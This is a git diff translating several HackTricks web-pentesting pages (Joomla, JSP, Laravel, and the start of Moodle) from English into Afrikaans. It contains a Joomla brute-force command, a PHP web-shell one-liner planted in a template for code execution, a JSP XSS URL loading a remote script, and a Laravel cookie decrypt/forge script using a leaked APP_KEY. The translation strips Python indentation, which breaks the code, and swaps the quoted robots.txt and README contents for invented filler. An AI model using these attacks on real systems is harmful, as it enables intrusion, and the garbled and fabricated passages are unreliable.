index db1dc04d5..48e7712f2 100644
--- a/network-services-pentesting/pentesting-web/joomla.md
+++ b/network-services-pentesting/pentesting-web/joomla.md
@@ -2,62 +2,83 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-### Joomla Statistics
-
-Joomla collects some anonymous [usage statistics](https://developer.joomla.org/about/stats.html) such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public [API](https://developer.joomla.org/about/stats/api.html).
+### Joomla Statistieke
 
+Joomla versamel sekere anonieme [gebruiksstatistieke](https://developer.joomla.org/about/stats.html) soos die uiteensetting van Joomla, PHP en databasisweergawes en bedienersisteem in gebruik op Joomla-installasies. Hierdie data kan ondervra word deur middel van hul openbare [API](https://developer.joomla.org/about/stats/api.html).
 ```bash
 curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
 
 {
-    "data": {
-        "cms_version": {
-            "3.0": 0,
-            "3.1": 0,
-            "3.10": 6.33,
-            "3.2": 0.01,
-            "3.3": 0.02,
-            "3.4": 0.05,
-            "3.5": 12.24,
-            "3.6": 22.85,
-            "3.7": 7.99,
-            "3.8": 17.72,
-            "3.9": 27.24,
-            "4.0": 3.21,
-            "4.1": 1.53,
-            "4.2": 0.82,
-            "4.3": 0,
-            "5.0": 0
-        },
-        "total": 2951032
-    }
+"data": {
+"cms_version": {
+"3.0": 0,
+"3.1": 0,
+"3.10": 6.33,
+"3.2": 0.01,
+"3.3": 0.02,
+"3.4": 0.05,
+"3.5": 12.24,
+"3.6": 22.85,
+"3.7": 7.99,
+"3.8": 17.72,
+"3.9": 27.24,
+"4.0": 3.21,
+"4.1": 1.53,
+"4.2": 0.82,
+"4.3": 0,
+"5.0": 0
+},
+"total": 2951032
+}
 }
 ```
+## Enumerasie
 
-## Enumeration
-
-### Discovery/Footprinting
-
-* Check the **meta**
+### Ontdekking/Voetspore
 
+* Kontroleer die **meta**
 ```bash
 curl https://www.joomla.org/ | grep Joomla | grep generator
 
 
 ```
+# robots.txt
 
-* robots.txt
+Die `robots.txt`-lêer is 'n tekstêr wat deur webwerwe gebruik word om aan soekenjins te vertel watter dele van die webwerf nie geïndekseer moet word nie. Dit is 'n belangrike hulpmiddel vir webwerf-eienaars om beheer oor die sienbaarheid van hul inhoud in soekenjins te hê.
 
+Die `robots.txt`-lêer is 'n eenvoudige tekslêer wat in die hoofgids van 'n webwerf geplaas word. Dit bevat instruksies vir soekenjins oor watter gedeeltes van die webwerf geïndekseer mag word en watter gedeeltes nie. Dit is belangrik om te verstaan dat die `robots.txt`-lêer slegs 'n aanbeveling is en dat soekenjins nie verplig is om dit te volg nie.
+
+Die sintaksis van die `robots.txt`-lêer is eenvoudig. Dit bestaan uit 'n reeks van regels wat elkeen 'n spesifieke instruksie bevat. Die mees algemene instruksies is `User-agent` en `Disallow`. Die `User-agent`-instruksie identifiseer die soekenjinbot wat die instruksies moet volg, terwyl die `Disallow`-instruksie spesifiseer watter gedeeltes van die webwerf nie geïndekseer mag word nie.
+
+Byvoorbeeld, as jy wil hê dat alle soekenjins jou hele webwerf moet ignoreer, kan jy die volgende reël in jou `robots.txt`-lêer insluit:
+
+```
+User-agent: *
+Disallow: /
+```
+
+Hierdie instruksie sal aan alle soekenjins sê om nie enige gedeelte van jou webwerf te indekseer nie. Dit is egter belangrik om versigtig te wees met die gebruik van die `Disallow`-instruksie, aangesien dit ook kan verhoed dat legitieme soekenjins toegang tot belangrike inhoud op jou webwerf verkry.
+
+Dit is ook moontlik om spesifieke gedeeltes van jou webwerf uit te sluit van indeksering. Byvoorbeeld, as jy wil hê dat 'n spesifieke gids op jou webwerf nie geïndekseer moet word nie, kan jy die volgende reël in jou `robots.txt`-lêer insluit:
+
+```
+User-agent: *
+Disallow: /gids/
+```
+
+Hierdie instruksie sal aan alle soekenjins sê om die `/gids/`-gids uit te sluit van indeksering. Dit beteken dat die inhoud van hierdie gids nie in soekenjins sal verskyn nie.
+
+Dit is belangrik om die `robots.txt`-lêer korrek te konfigureer en gereeld te hersien om te verseker dat dit die gewenste resultate lewer. Foute in die `robots.txt`-lêer kan lei tot onbedoelde gevolge, soos die uitsluiting van belangrike inhoud uit soekenjins.
 ```
 # If the Joomla site is installed within a folder
 # eg www.example.com/joomla/ then the robots.txt file
@@ -67,60 +88,94 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
 # paths.
 [...]
 ```
+# README.txt
 
-* README.txt
+Hierdie lêer bevat inligting oor die pentesting van Joomla-webwerwe. Dit bevat 'n lys van hulpmiddels en tegnieke wat gebruik kan word om die veiligheid van 'n Joomla-webwerf te toets en te beproef.
 
+## Inhoud
+
+1. **Joomla Pentesting-gids**
+   - Inleiding tot Joomla-pentesting
+   - Identifisering van Joomla-weergawes
+   - Joomla-weergawe-uitbuiting
+   - Joomla-gebruikersinligting oopmaak
+   - Joomla-databasisinligting oopmaak
+   - Joomla-tema- en uitbreidingsinligting oopmaak
+   - Joomla-beveiligingsmaatreëls
+   - Aanbevelings vir die versterking van Joomla-webwerwe
+
+2. **Hulpmiddels vir Joomla Pentesting**
+   - Joomla-scanners
+   - Joomla-uitbuitingshulpmiddels
+   - Joomla-databasisverkenner
+   - Joomla-wagwoordkraker
+   - Joomla-tema- en uitbreidingsontleder
+   - Joomla-veiligheidstoetshulpmiddels
+
+3. **Aanvullende bronne**
+   - Nuttige webwerwe en blogs
+   - Boeke en artikels oor Joomla-pentesting
+   - Aanlyngemeenskappe en forums
+
+## Bydraes
+
+As jy enige bydraes of voorstelle het om hierdie gids te verbeter, voel asseblief vry om 'n bydrae te maak deur 'n trekversoek in te dien. Ons waardeer enige bydrae wat kan help om hierdie gids meer volledig en nuttig te maak.
+
+## Lisensie
+
+Hierdie gids is gelisensieer onder die [MIT-lisensie](https://opensource.org/licenses/MIT). Jy is vry om die inhoud te gebruik, te wysig en te versprei volgens die voorwaardes van hierdie lisensie.
+
+## Skakels
+
+- [HackTricks](https://book.hacktricks.xyz/)
+- [Joomla](https://www.joomla.org/)
+- [Joomla Security Centre](https://developer.joomla.org/security-centre.html)
 ```
 1- What is this?
-	* This is a Joomla! installation/upgrade package to version 3.x
-	* Joomla! Official site: https://www.joomla.org
-	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
-	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
+* This is a Joomla! installation/upgrade package to version 3.x
+* Joomla! Official site: https://www.joomla.org
+* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
+* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
 ```
+### Weergawe
 
-### Version
-
-* In **/administrator/manifests/files/joomla.xml** you can see the version.
-* In **/language/en-GB/en-GB.xml** you can get the version of Joomla.
-* In **plugins/system/cache/cache.xml** you can see an approximate version.
-
-### Automatic
+* In **/administrator/manifests/files/joomla.xml** kan jy die weergawe sien.
+* In **/language/en-GB/en-GB.xml** kan jy die weergawe van Joomla kry.
+* In **plugins/system/cache/cache.xml** kan jy 'n benaderende weergawe sien.
 
+### Outomaties
 ```bash
 droopescan scan joomla --url http://joomla-site.local/
 ```
-
-In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
+In[ **80,443 - Pentesting Web Metodologie is 'n afdeling oor CMS-skanners**](./#cms-skanners) wat Joomla kan skandeer.
 
 ### Brute-Force
 
-You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.
-
+Jy kan hierdie [skripsie](https://github.com/ajnik/joomla-bruteforce) gebruik om die aanmelding met geweld te probeer.
 ```shell-session
 sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
- 
+
 admin:admin
 ```
-
 ## RCE
 
-If you managed to get **admin credentials** you can **RCE inside of it** by adding a snippet of **PHP code** to gain **RCE**. We can do this by **customizing** a **template**.
+As jy daarin slaag om **admin-legitimasie** te kry, kan jy **RCE binne-in dit** kry deur 'n stukkie **PHP-kode** by te voeg om **RCE** te verkry. Ons kan dit doen deur 'n **sjabloon** aan te pas.
 
-1. **Click** on **`Templates`** on the bottom left under `Configuration` to pull up the templates menu.
-2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This will bring us to the **`Templates: Customise`** page.
-3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows:
-   1. **`system($_GET['cmd']);`**
+1. **Klik** op **`Templates`** aan die onderkant links onder `Configuration` om die sjabloonmenu op te roep.
+2. **Klik** op 'n **sjabloonnaam**. Laat ons **`protostar`** onder die `Template`-kolomkop kies. Dit sal ons na die **`Templates: Customise`**-bladsy bring.
+3. Uiteindelik kan jy op 'n bladsy klik om die **bladsybron** op te roep. Laat ons die **`error.php`**-bladsy kies. Ons sal 'n **PHP-eenreëler byvoeg om kode-uitvoering te verkry** soos volg:
+1. **`system($_GET['cmd']);`**
 4. **Save & Close**
 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-web/jsp.md b/network-services-pentesting/pentesting-web/jsp.md
index 979ebf355..ac577c1c5 100644
--- a/network-services-pentesting/pentesting-web/jsp.md
+++ b/network-services-pentesting/pentesting-web/jsp.md
@@ -1,45 +1,39 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-#  **getContextPath** abuse
-
-Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
+#  **getContextPath** misbruik
 
+Inligting van [hier](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
 ```
- http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
+http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
 ```
-
-Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
+Toegang tot daardie webwerf kan jy al die skakels verander om die inligting na _**rakeshmane.com**_ te versoek:
 
 ![](<../../.gitbook/assets/image (260).png>)
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/laravel.md b/network-services-pentesting/pentesting-web/laravel.md
index df3fece76..264e1cac9 100644
--- a/network-services-pentesting/pentesting-web/laravel.md
+++ b/network-services-pentesting/pentesting-web/laravel.md
@@ -2,37 +2,36 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-## Laravel Tricks
+## Laravel Truuks
 
-### Debugging mode
+### Debug-modus
 
-If Laravel is in **debugging mode** you will be able to access the **code** and **sensitive data**.\
-For example `http://127.0.0.1:8000/profiles`:
+As Laravel in **debug-modus** is, sal jy toegang hê tot die **kode** en **sensitiewe data**.\
+Byvoorbeeld `http://127.0.0.1:8000/profiles`:
 
 ![](<../../.gitbook/assets/image (610).png>)
 
-This is usually needed for exploiting other Laravel RCE CVEs.
+Dit is gewoonlik nodig om ander Laravel RCE CVE's te benut.
 
 ### .env
 
-Laravel saves the APP it uses to encrypt the cookies and other credentials inside a file called `.env` that can be accessed using some path traversal under: `/../.env`
+Laravel stoor die APP wat dit gebruik om die koekies en ander geloofsbriewe te enkripteer binne 'n lêer genaamd `.env` wat toeganklik is deur middel van 'n padtraversal onder: `/../.env`
 
-Laravel will also show this information inside the debug page (that appears when Laravel finds an error and it's activated).
+Laravel sal ook hierdie inligting wys op die foutopsporingsbladsy (wat verskyn wanneer Laravel 'n fout vind en dit geaktiveer is).
 
-Using the secret APP\_KEY of Laravel you can decrypt and re-encrypt cookies:
-
-### Decrypt Cookie
+Met die geheime APP\_KEY van Laravel kan jy koekies dekripteer en herenkripteer:
 
+### Dekripteer Koekie
 ```python
 import os
 import json
@@ -48,42 +47,42 @@ from phpserialize import loads, dumps
 #https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
 
 def mcrypt_decrypt(value, iv):
-    global key
-    AES.key_size = [len(key)]
-    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
-    return crypt_object.decrypt(value)
+global key
+AES.key_size = [len(key)]
+crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
+return crypt_object.decrypt(value)
 
 
 def mcrypt_encrypt(value, iv):
-    global key
-    AES.key_size = [len(key)]
-    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
-    return crypt_object.encrypt(value)
+global key
+AES.key_size = [len(key)]
+crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
+return crypt_object.encrypt(value)
 
 
 def decrypt(bstring):
-    global key
-    dic = json.loads(base64.b64decode(bstring).decode())
-    mac = dic['mac']
-    value = bytes(dic['value'], 'utf-8')
-    iv = bytes(dic['iv'], 'utf-8')
-    if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
-        return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
-        #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
-    return ''
+global key
+dic = json.loads(base64.b64decode(bstring).decode())
+mac = dic['mac']
+value = bytes(dic['value'], 'utf-8')
+iv = bytes(dic['iv'], 'utf-8')
+if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
+return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
+#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
+return ''
 
 
 def encrypt(string):
-    global key
-    iv = os.urandom(16)
-    #string = dumps(string)
-    padding = 16 - len(string) % 16
-    string += bytes(chr(padding) * padding, 'utf-8')
-    value = base64.b64encode(mcrypt_encrypt(string, iv))
-    iv = base64.b64encode(iv)
-    mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
-    dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
-    return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
+global key
+iv = os.urandom(16)
+#string = dumps(string)
+padding = 16 - len(string) % 16
+string += bytes(chr(padding) * padding, 'utf-8')
+value = base64.b64encode(mcrypt_encrypt(string, iv))
+iv = base64.b64encode(iv)
+mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
+dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
+return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
 
 app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
 key = base64.b64decode(app_key)
@@ -91,32 +90,31 @@ decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1
 #b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
 encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')
 ```
+### Laravel Deserialisasie RCE
 
-### Laravel Deserialization RCE
+Vulnerabele weergawes: 5.5.40 en 5.6.x tot en met 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
 
-Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
+Hier kan jy inligting oor die deserialisasie kwesbaarheid vind: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
 
-Here you can find information about the deserialization vulnerability here: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
-
-You can test and exploit it using [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
-Or you can also exploit it with metasploit: `use unix/http/laravel_token_unserialize_exec`
+Jy kan dit toets en uitbuit met behulp van [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
+Of jy kan dit ook uitbuit met metasploit: `use unix/http/laravel_token_unserialize_exec`
 
 ### CVE-2021-3129
 
-Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
+'n Ander deserialisasie: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
 
 ### Laravel SQLInjection
 
-Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+Lees inligting hieroor hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-web/moodle.md b/network-services-pentesting/pentesting-web/moodle.md
index 11f2dce98..63f1f3ebe 100644
--- a/network-services-pentesting/pentesting-web/moodle.md
+++ b/network-services-pentesting/pentesting-web/moodle.md
@@ -2,51 +2,90 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
